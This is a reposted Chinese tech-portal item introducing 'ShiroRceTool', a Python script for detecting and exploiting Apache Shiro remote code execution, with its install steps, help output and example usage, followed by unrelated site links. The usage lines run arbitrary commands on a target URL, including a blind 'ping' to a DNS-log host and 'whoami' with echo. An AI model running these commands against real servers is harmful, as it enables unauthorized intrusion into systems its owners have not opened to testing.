0x01 工具介绍
一个简单的Shiro RCE检测和利用脚本。
0x02 安装与使用
1、安装需要的包
pip install -r requirements.txt
2、检查该漏洞
python ShiroRceTool.py -m scan -u "http://example.com"
3、执行命令 (不回显)
python ShiroRceTool.py -m exploit -u "http://example.com" -c "ping dnslog.example.com"
4、执行命令(尝试回显)
python ShiroRceTool.py -m exploit -u "http://example.com" -c "whoami" -e
5、获取帮助 - Get help
python ShiroRceTool.py ____ _ _ ____ _____ _ / ___|| |__ (_)_ __ ___ | _ ___ __|_ _|__ ___ | | \___ | '_ | | '__/ _ | |_) / __/ _ | |/ _ / _ | | ___) | | | | | | | (_) | _ < (_| __/| | (_) | (_) | | |____/|_| |_|_|_| \___/|_| _\___\___||_|\___/ \___/|_| By: Hack3rHan usage: ShiroRceTool.py [-h] [-m MODE] [-u URL] [-c CMD] [-e] options: -h, --help show this help message and exit -m MODE, --mode MODE "exploit" or "scan". -u URL, --url URL URL of the target. -c CMD, --cmd CMD Command to execute. -e, --echo Echo mode.
审核编辑:汤梓红
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。
举报投诉
-
检测
+关注
关注
5文章
4083浏览量
90745 -
命令
+关注
关注
5文章
638浏览量
21849 -
脚本
+关注
关注
1文章
372浏览量
14635
原文标题:一个简单的Shiro RCE检测和利用脚本。
文章出处:【微信号:菜鸟学安全,微信公众号:菜鸟学安全】欢迎添加关注!文章转载请注明出处。
发布评论请先 登录
相关推荐
Lua脚本简单介绍
Lua简单介绍Lua[1]是一个小巧的脚本语言。作者是巴西人。该语言的设计目的是为了嵌入应用程序中,从而为应用程序提供灵活的扩展和定制功能。Lua脚
发表于 08-20 06:37
Lua脚本简单介绍
Lua简单介绍Lua[1]是一个小巧的脚本语言。作者是巴西人。该语言的设计目的是为了嵌入应用程序中,从而为应用程序提供灵活的扩展和定制功能。Lua脚
发表于 08-20 08:06
基于DirectShow技术的RCE算法视频加密方案
本文设计了一种利用DirectShow 技术结合一种新的RCE 算法实现视频数据加密的方案。首先介绍了RCE 算法的加密解密过程和原理,然后研究了如何将RCE 算法应用到DirectS
发表于 06-26 08:52
•35次下载
Apache Shiro框架的详细资料说明
自 2015 年 9 月 10 日以来,KyCore 项目中的用户机制已被完整地替换为了以 Apache Shiro 框架为基础建立的全新用户机制,原有的用户机制已基本上被全部删除。更新以来,同事
发表于 03-08 08:00
•4次下载
如何巧妙利用HFSS脚本录制功能
。 摘要: 在学个Antenna:HFSS脚本建模入门中,介绍了利用HFSS自带的Record Script To File功能进行脚本录制。但是大部分情况下,工程师们只是希望录制简单
shiro综合利用工具介绍
shiro综合利用工具:ShiroExp 工具介绍 shiro一把梭工具,该轮子主要有三大功能如下: 1、默认密钥爆破 利用SimplePrincipalCollection进行
三极管用饱和Rce,而MOSFET用饱和Vds?
三极管ON状态时工作于饱和区,导通电流Ice主要由Ib与Vce决定,由于三极管的基极驱动电流Ib一般不能保持恒定,因而Ice就不能简单的仅 由Vce来决定,即不能采用饱和Rce来表示(因Rce会变化)。由于饱和状态下Vce较小,
发表于 06-05 14:26
•473次阅读
Weblogic上的shiro漏洞利用工具介绍
日常项目中,可能会碰见部署在weblogic上的shiro,所以先写了这个生成攻击payload的小Demo,方便后面使用。但目前只支持无回显命令执行,后续回显、内存马功能后面出差后再写。
shiro如何实现Web应用认证
前面简单介绍了shiro这个框架的一些基本知识,包括其架构模型,主要的功能,关键名称的含义,以及核心模块和对应的接口定义。 开始的话 今天我们从一个简单示例,先了解使用shiro实现W
Shiro功能介绍
部分配置进行修改即可使用。对于其原理也只是知道个大概,具体实现细节可以说是一无所知。 Shiro作为安全框架,相比其他同类型框架,在整体结构上更显得简单且更易于理解,通过对Shrio的学习,在理解里其实现原理后,对后面学习其他同类型的框架也
评论